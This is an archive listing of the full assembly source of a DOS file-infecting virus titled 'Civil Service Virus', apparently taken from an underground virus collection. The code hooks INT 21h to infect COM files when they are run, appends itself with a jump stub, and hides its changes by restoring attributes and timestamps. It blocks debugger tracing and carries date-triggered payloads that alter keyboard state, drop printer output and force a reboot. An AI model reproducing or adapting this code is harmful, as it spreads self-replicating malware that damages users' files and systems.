home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / c / civil.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  10.2 KB  |  570 lines
  1. ; Civil Service Virus by Marvin Giskard
  2. ; Turbo Assember version 2
  3.  
  4. Exec        equ  4B00h
  5. OpenFile    equ  3D02h
  6. ReadFile    equ  3Fh
  7. WriteFile   equ  40h
  8. CloseFile   equ  3Eh
  9. EXESign     equ  5A4Dh
  10. SeekTop     equ  4200h
  11. SeekEnd     equ  4202h
  12. GetAttr     equ  4300h
  13. SetAttr     equ  4301h
  14. GetDT       equ  5700h
  15. SetDT       equ  5701h
  16. MinSize     equ  4h
  17. MaxSize     equ  0FBF0h
  18. GetDate     equ  2Bh
  19. FileID      equ  2206h
  20. MemID       equ  4246h     ;     'FB'
  21.  
  22. .MODEL SMALL
  23. .CODE
  24. ORG 0100h
  25.  
  26. Start:
  27.   XOR AX, AX
  28.   MOV DS, AX
  29.   CMP WORD PTR DS:01ACh, MemID
  30.   JNE Instl2
  31.   CMP WORD PTR DS:01AEh, FileID
  32.   JE NoInstl2
  33.  
  34. Instl2:
  35.   CALL InstallInMem
  36.  
  37. NoInstl2:
  38.   PUSH CS
  39.   PUSH CS
  40.   POP DS
  41.   POP ES
  42.   MOV DX, OFFSET FileName
  43.   MOV AX, 4B22h
  44.   INT 21h
  45.   INT 20h
  46.  
  47. FileName: DB 'TEST.COM',0
  48.  
  49. AddCode:
  50.   JMP OverData
  51.  
  52.   ; Addcode's data
  53.  
  54. Buf:          DB 0, 0                   ; Miscellaneous Buf
  55. JumpCode:     DB 0E9h, 00h, 00h         ; Code to be placed at front of file
  56. FSize:        DW 0                      ; File size
  57. Attr:         DB 0                      ; Attr of file being infected
  58. FDateTime:    DD 0                      ; Time and date of file being infected
  59. Generation:   DW 0                      ; Generation counter
  60. Infected:     DW 0                      ; Number of files infected
  61. Old24Handler: DD 0                      ; Old INT 24h handler
  62. Acts:         DB 0                      ; Flag to stop reentry
  63. Path:         DD 0
  64.  
  65. OverData:
  66.   MOV WORD PTR DS:0100h, 0000h
  67.   MOV BYTE PTR DS:0102h, 00h
  68.  
  69.   ; Check if handler already installed by examining 2 words in vector
  70.   ; table entry of INT 6Bh
  71.  
  72.   XOR AX, AX
  73.   MOV DS, AX
  74.   CMP WORD PTR DS:01ACh, MemID
  75.   JNE Instl
  76.   CMP WORD PTR DS:01AEh, FileID
  77.   JE AlreadyInstalled
  78.  
  79. Instl:
  80.   CALL InstallInMem
  81.   JMP ALreadyInstalled
  82.  
  83. InstallInMem:
  84.   MOV WORD PTR DS:01ACh, MemID
  85.   MOV WORD PTR DS:01AEh, FileID
  86.  
  87.   PUSH CS
  88.   POP DS
  89.  
  90.   ; Get INT 21h handler in ES:BX.
  91.  
  92.   MOV AX, 3521h
  93.   INT 21h
  94. DoOldOfs:
  95.   MOV SI, OFFSET DoOld+1
  96.   MOV [SI], BX
  97.   MOV [SI+2], ES
  98.   PUSH ES
  99.   PUSH BX
  100.   POP DX
  101.   POP DS
  102.   MOV AX, 256Dh
  103.   INT 21h
  104.  
  105.   ; This label is here so that the infect part will be able to calculate
  106.   ; source offset of Int21Handler and then place it in here before writing
  107.   ; it to disk. The OFFSET AddCode will be replaced by the right number.
  108.  
  109. Source:
  110.   MOV SI, OFFSET AddCode
  111.  
  112.   ; Destination e.g. Where program will be placed are now calculated by
  113.   ; taking the amount of memory in $0040:$0013. Multiply by 16 to get
  114.   ; segment of memory end and then subract amount of blocks needed.
  115.   ; This is where routine will be placed.
  116.  
  117.   MOV AX, 0040h
  118.   MOV DS, AX
  119.   MOV AX, WORD PTR DS:0013h
  120.   MOV CL, 6
  121.   SHL AX, CL
  122.  
  123.   ; Set dest. segment 2048 pages (32 K) below top of memory.
  124.  
  125.   SUB AX, 2048
  126.   MOV ES, AX
  127.   XOR DI, DI
  128.   MOV CX, OFFSET AddCodeEnd - OFFSET AddCode
  129.   PUSH CS
  130.   POP DS
  131.   REP MOVSB
  132.  
  133.   ; Set INT 21h Handler to point to our routine
  134.  
  135.   MOV AX, 2521h
  136.   PUSH ES
  137.   POP DS
  138.   MOV DX, OFFSET Int21Handler - OFFSET AddCode
  139.   INT 21h
  140.  
  141.   MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0
  142.  
  143.   RET
  144.  
  145. AlreadyInstalled:
  146.  
  147.   Call DisTrace
  148.  
  149.   ; Code to jump back to 0100h
  150.  
  151.   PUSH CS
  152.   PUSH CS
  153.   POP DS
  154.   POP ES
  155.   MOV AX, 0100h
  156.   JMP AX
  157.  
  158.   ; Disable tracing and breakpoint setting for debuggers.
  159.  
  160. DisTrace:
  161.   MOV AX, 0F000h
  162.   MOV DS, AX
  163.   MOV DX, 0FFF0h
  164.   MOV AX, 2501h
  165.   INT 21h
  166.   MOV AX, 2503h
  167.   INT 21h
  168.   RET
  169.  
  170. Int21Handler:
  171.   PUSH AX
  172.   PUSH BX
  173.   PUSH CX
  174.   PUSH DX
  175.   PUSH DI
  176.   PUSH SI
  177.   PUSH ES
  178.   PUSH DS
  179.  
  180.   ; Install devious act if seed is right
  181.  
  182.   MOV AH, 2Ah
  183.   INT 6Dh
  184.   CMP CX, 1991
  185.   JB Act
  186.   CMP DL, 22
  187.   JNE Timer
  188.   DB 0EAh, 0F0h, 0FFh, 00h, 0F0h
  189.  
  190. Timer:
  191.   MOV AH, 25h
  192.   CMP DL, 29
  193.   JE Inst1
  194.   CMP DL, 1
  195.   JE Inst2
  196.   CMP DL, 10
  197.   JE Inst3
  198.   CMP DL, 16
  199.   JE Inst4
  200.   JMP Act
  201. Inst1:
  202.   MOV AL, 13h
  203.   JMP SetVec
  204. Inst2:
  205.   MOV AL, 16h
  206.   JMP SetVec
  207. Inst3:
  208.   MOV AL, 0Dh
  209.   JMP SetVec
  210. Inst4:
  211.   MOV AL, 10h
  212.  
  213. SetVec:
  214.   PUSH CS
  215.   POP DS
  216.   MOV DX, OFFSET Int24Handler - OFFSET AddCode
  217.   INT 6Dh
  218.  
  219. Act:
  220.   MOV AX, 0040h
  221.   MOV DS, AX
  222.   MOV AX, WORD PTR DS:006Eh
  223.  
  224.   PUSH CS
  225.   POP DS
  226.   MOV BH, DS:[OFFSET Acts - OFFSET AddCode]
  227.   CMP BH, 3
  228.   JE NoAct
  229.  
  230.   CMP AX, 22
  231.   JE NoAct
  232.  
  233.   MOV BYTE PTR [SI], 3
  234.   MOV AX, 3509h
  235.   INT 21h
  236.   PUSH ES
  237.   PUSH BX
  238.   POP DX
  239.   POP DS
  240.   MOV AX, 256Ah
  241.   INT 21h
  242.   PUSH CS
  243.   POP DS
  244.   MOV DX, OFFSET Int9Handler - OFFSET AddCode
  245.   MOV AX, 2509h
  246.   INT 21h
  247.  
  248.   MOV AX, 3517h
  249.   INT 21h
  250.   PUSH ES
  251.   PUSH BX
  252.   POP DX
  253.   POP DS
  254.   MOV AX, 256Ch
  255.   INT 21h
  256.   PUSH CS
  257.   POP DS
  258.   MOV DX, OFFSET Int17Handler - OFFSET AddCode
  259.   MOV AX, 2517h
  260.   INT 21h
  261.  
  262. NoAct:
  263.  
  264.   POP DS
  265.   POP ES
  266.   POP SI
  267.   POP DI
  268.   POP DX
  269.   POP CX
  270.   POP BX
  271.   POP AX
  272.  
  273.   CMP AH, 4Bh
  274.   JE Infect
  275. DoOld:
  276.   ;  This next bytes represent a JMP 0000h:0000h. The 0's will be replaced
  277.   ;  by the address of the old 21 handler.
  278.   DB 0EAh
  279.   DD 0
  280.  
  281. DoOldPop:
  282.   POP ES
  283.   POP DS
  284.   POP BP
  285.   POP DI
  286.   POP SI
  287.   POP DX
  288.   POP CX
  289.   POP BX
  290.   POP AX
  291.   JMP DoOld
  292.  
  293. CloseQuit:
  294.  
  295.   MOV AX, 2524h
  296.   MOV SI, OFFSET Old24Handler-OFFSET AddCode
  297.   MOV DX, CS:[SI]
  298.   MOV DS, CS:[SI+2]
  299.   INT 21h
  300.  
  301.   PUSH CS
  302.   POP DS
  303.   MOV SI, OFFSET FDateTime-OFFSET AddCode
  304.   MOV CX, DS:[SI]
  305.   MOV DX, DS:[SI+2]
  306.   MOV AX, SetDT
  307.   INT 21h
  308.  
  309.   MOV AH, CloseFile
  310.   INT 21h
  311.  
  312.   MOV AX, SetAttr
  313.   MOV CL, DS:[OFFSET Attr - OFFSET AddCode]
  314.   XOR CH, CH
  315.   MOV SI, OFFSET Path-OFFSET AddCode
  316.   MOV DX, DS:[SI]
  317.   MOV DS, DS:[SI+2]
  318.  
  319.   INT 21h
  320.  
  321.   JMP DoOldPop
  322.  
  323. Infect:
  324.   PUSH AX
  325.   PUSH BX
  326.   PUSH CX
  327.   PUSH DX
  328.   PUSH SI
  329.   PUSH DI
  330.   PUSH BP
  331.   PUSH DS
  332.   PUSH ES
  333.  
  334.   ; Get file's attr
  335.  
  336.   MOV AX, GetAttr
  337.   INT 21h
  338.   JC CloseQuit
  339.   MOV CS:[OFFSET Attr-OFFSET AddCode], CL
  340.  
  341.   MOV SI, OFFSET Path-OFFSET AddCode
  342.   MOV CS:[SI], DX
  343.   MOV CS:[SI+2], DS
  344.  
  345.   ; Get/Set INT 24h handler
  346.  
  347.   MOV AX, 3524h
  348.   INT 21h
  349.   MOV SI, OFFSET Old24Handler-OFFSET AddCode
  350.   MOV CS:[SI], BX
  351.   MOV CS:[SI+2], ES
  352.   MOV AX, 2524h
  353.   PUSH CS
  354.   POP DS
  355.   MOV DX, OFFSET Int24Handler-OFFSET AddCode
  356.   INT 21h
  357.  
  358.   ; Set new attribute
  359.  
  360.   MOV SI, OFFSET Path-OFFSET AddCode
  361.   MOV DX, CS:[SI]
  362.   MOV DS, CS:[SI+2]
  363.  
  364.   MOV AX, SetAttr
  365.   MOV CX, 0020h
  366.   INT 21h
  367.   JC CloseQuitFoot
  368.  
  369.   MOV AX, OpenFile
  370.   INT 21h
  371.   JC CloseQuitFoot
  372.   MOV BX, AX
  373.  
  374.   ; Get file's time and date and store
  375.  
  376.   MOV AX, GetDT
  377.   INT 21h
  378.   JC CloseQuitFoot
  379.   PUSH CS
  380.   POP DS
  381.   MOV SI, OFFSET FDateTime-OFFSET AddCode
  382.   MOV DS:[SI], CX
  383.   MOV DS:[SI+2], DX
  384.  
  385.   ; Read first two bytes of file
  386.  
  387.   MOV AH, ReadFile
  388.   MOV CX, 2
  389.   MOV DX, OFFSET OverData+4-OFFSET AddCode
  390.   INT 21h
  391.   JC CloseQuitFoot
  392.  
  393.   ; Check if fisrt two bytes identify the file as an EXE file
  394.   ; If so, then don't infect the file
  395.  
  396.   CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign
  397.   JE CloseQuitFoot
  398.  
  399.   ; Read next byte
  400.  
  401.   MOV AH, ReadFile
  402.   MOV CX, 1
  403.   MOV DX, OFFSET OverData+10-OFFSET AddCode
  404.   INT 21h
  405.   JC CloseQuitFoot
  406.  
  407.   ; Get file size
  408.  
  409.   MOV AX, SeekEnd
  410.   XOR CX, CX
  411.   XOR DX, DX
  412.   INT 21h
  413.   JC CloseQuitFoot
  414.  
  415.   ; Save filesize and calculate jump offset
  416.  
  417.   CMP DX, 0
  418.   JG CloseQuitFoot
  419.   CMP AX, MinSize
  420.   JB CloseQuitFoot
  421.   CMP AX, MaxSize
  422.   JA CloseQuitFoot
  423.   MOV DS:[OFFSET FSize-OFFSET AddCode], AX
  424.   MOV CX, AX
  425.   SUB AX, 03h
  426.   MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX
  427.  
  428.   ; Calculate and store source
  429.  
  430.   ADD CX, 0100h
  431.   MOV [OFFSET Source+1-OFFSET AddCode], CX
  432.  
  433.   ADD CX, OFFSET DoOld-OFFSET AddCode
  434.   MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX
  435.  
  436.   JMP OverFoot1
  437.  
  438. CloseQuitFoot:
  439.   JMP CloseQuit
  440.  
  441. OverFoot1:
  442.   ; Read last 2 bytes to see if it is already infected
  443.  
  444.   MOV AX, SeekTop
  445.   XOR CX, CX
  446.   MOV DX, [OFFSET FSize-OFFSET AddCode]
  447.   SUB DX, 2
  448.   INT 21h
  449.  
  450.   MOV AH, ReadFile
  451.   MOV CX, 2
  452.   MOV DX, OFFSET Buf-OFFSET AddCode
  453.   INT 21h
  454.  
  455.   CMP [OFFSET Buf-OFFSET AddCode], FileID
  456.   JE CloseQuitFoot
  457.  
  458.   ; Prepare to write new jump
  459.  
  460.   MOV AX, SeekTop
  461.   XOR CX, CX
  462.   XOR DX, DX
  463.   INT 21h
  464.  
  465.   ; Write new jump
  466.  
  467.   MOV AH, WriteFile
  468.   MOV CX, 3
  469.   MOV DX, OFFSET JumpCode-OFFSET AddCode
  470.   INT 21h
  471.  
  472.   ; Write addcode
  473.   ; Code to restore first three bytes is at start of addcode
  474.   ; Int21 handler is also included
  475.   ; Generation counter is included in data
  476.   ; ID is at the end of addcode
  477.  
  478.   MOV AX, SeekEnd
  479.   XOR CX, CX
  480.   XOR DX, DX
  481.   INT 21h
  482.  
  483.   ; Increase generation counter before writing it to the new file
  484.  
  485.   INC WORD PTR [OFFSET Generation - OFFSET AddCode]
  486.  
  487.   ; Set files infected to 0, for child hasn't infected anyone.
  488.  
  489.   MOV SI, OFFSET Infected - OFFSET AddCode
  490.   PUSH WORD PTR [SI]
  491.   MOV WORD PTR [SI], 0
  492.  
  493.   MOV AH, WriteFile
  494.   MOV DX, OFFSET AddCode - OFFSET AddCode      ; 0000
  495.   MOV CX, OFFSET AddCodeEnd - OFFSET AddCode
  496.   INT 21h
  497.  
  498.   ; Decrease counter again, cause all his children should have the same
  499.   ; generation count
  500.  
  501.   DEC WORD PTR [OFFSET Generation - OFFSET AddCode]
  502.  
  503.   ; Pop number of files infected and incread
  504.  
  505.   POP AX
  506.   INC AX
  507.   MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX
  508.  
  509.   JMP CloseQuit
  510.  
  511. Int24Handler:
  512.   XOR AL, AL
  513.   IRET
  514.  
  515. Int9Handler:
  516.   PUSH AX
  517.   PUSH CX
  518.   PUSH DS
  519.  
  520.   MOV AX, 0040h
  521.   MOV DS, AX
  522.   MOV AH, BYTE PTR DS:006Ch
  523.   CMP AH, 18
  524.   JA NoChange
  525.   MOV CL, 4
  526.   SHL AH, CL
  527.   SHR AH, CL
  528.   MOV BYTE PTR DS:0017h, AH
  529.  
  530. NoChange:
  531.   POP DS
  532.   POP CX
  533.   POP AX
  534.   INT 6Ah
  535.   IRET
  536.  
  537. Int17Handler:
  538.   CMP AH, 00h
  539.   JNE DoOld17
  540.   PUSH DS
  541.   PUSH AX
  542.   PUSH BX
  543.   MOV BX, 0040h
  544.   MOV DS, BX
  545.   MOV BH, BYTE PTR DS:006Ch
  546.   SHR BH, 1
  547.   SHR BH, 1
  548.   CMP BH, 22h
  549.   JE Ignore17
  550.   POP BX
  551.   POP AX
  552.   POP DS
  553.  
  554. DoOld17:
  555.   INT 6Ch
  556.   IRET
  557.  
  558. Ignore17:
  559.   POP BX
  560.   POP AX
  561.   POP DS
  562.   IRET
  563.  
  564.   DW FileID
  565.  
  566. AddCodeEnd:
  567.  
  568. END Start
  569. 
  570.